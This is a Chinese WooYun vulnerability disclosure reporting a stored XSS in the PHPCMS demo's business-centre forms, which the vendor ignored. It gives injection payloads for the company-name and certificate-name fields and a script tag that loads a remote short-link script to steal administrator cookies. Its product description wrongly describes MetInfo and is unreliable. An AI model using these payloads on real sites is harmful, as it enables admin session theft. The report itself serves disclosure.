当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089704

漏洞标题:PHPCMS储存型XSS盲打后台(demo)

相关厂商:phpcms

漏洞作者: 路人甲

提交时间:2015-03-11 14:32

修复时间:2015-06-14 14:34

公开时间:2015-06-14 14:34

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-11: 细节已通知厂商并且等待厂商处理中
2015-03-16: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-10: 细节向核心白帽子及相关领域专家公开
2015-05-20: 细节向普通白帽子公开
2015-05-30: 细节向实习白帽子公开
2015-06-14: 细节向公众公开

简要描述:

MetInfo企业网站管理系统采用PHP+Mysql架构,全站内置了SEO搜索引擎优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块功能(企业简介模块、新闻模块、产品模块、下载模块、图片模块、招聘模块、在线留言、反馈系统、在线交流、友情链接、网站地图、会员与权限管理)。

详细说明:

XSS的地方在会员中心--商务中心--商家资料--企业名称那里,直接插入<body/onload=alert(1)>就能触发

1.png


2.png


由于他这个演示没有后台管理,所以不知道能不能打后台,无奈只好本地搭建测试了(我嘞个擦擦,时间都浪费在这儿了,先下载的官方最新安装包,然后发现没有商务中心这个模块,百度之后知道那个属于企业版,要下载个企业黄页,然后好不容易在官方找到了企业黄页的扩展包,又有好多问题。。不多了,说多了都是泪啊。。),本地搭建测试成功后,登陆后台可以看到成功弹窗

3.png


然后我就兴致冲冲的来提交漏洞,我怕有重复的洞啊(心里想的应该不会有吧),然后就去百度和乌云,360和其他平台找了找,我凑没想到果然有重复的洞。。
当时我那个心情啊。。不说了。。没办法既然有重复的洞就再继续挖吧,果然黄天不负有心人,我又成功挖到了一个可以打后台的储存型XSS,这个在商务中心--资质证书--证书名称那里,直接插"/><body/onload=alert(1)>

4.png


然后可以看到成功弹窗

5.png


接下来来到后台看看,成功~

6.png


大牛们说了成功弹窗的黑阔不是好黑阔,打到cookie的黑阔才是好黑阔,试试能不能打cookie吧,继续构造"><script src=http://t.cn/Rzztv4u></script>

7.png


然后后台查看后去平台看看,成功打到cookie~

9.png

漏洞证明:

9.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-14 14:34

厂商回复:

最新状态:

暂无


漏洞评价:

评论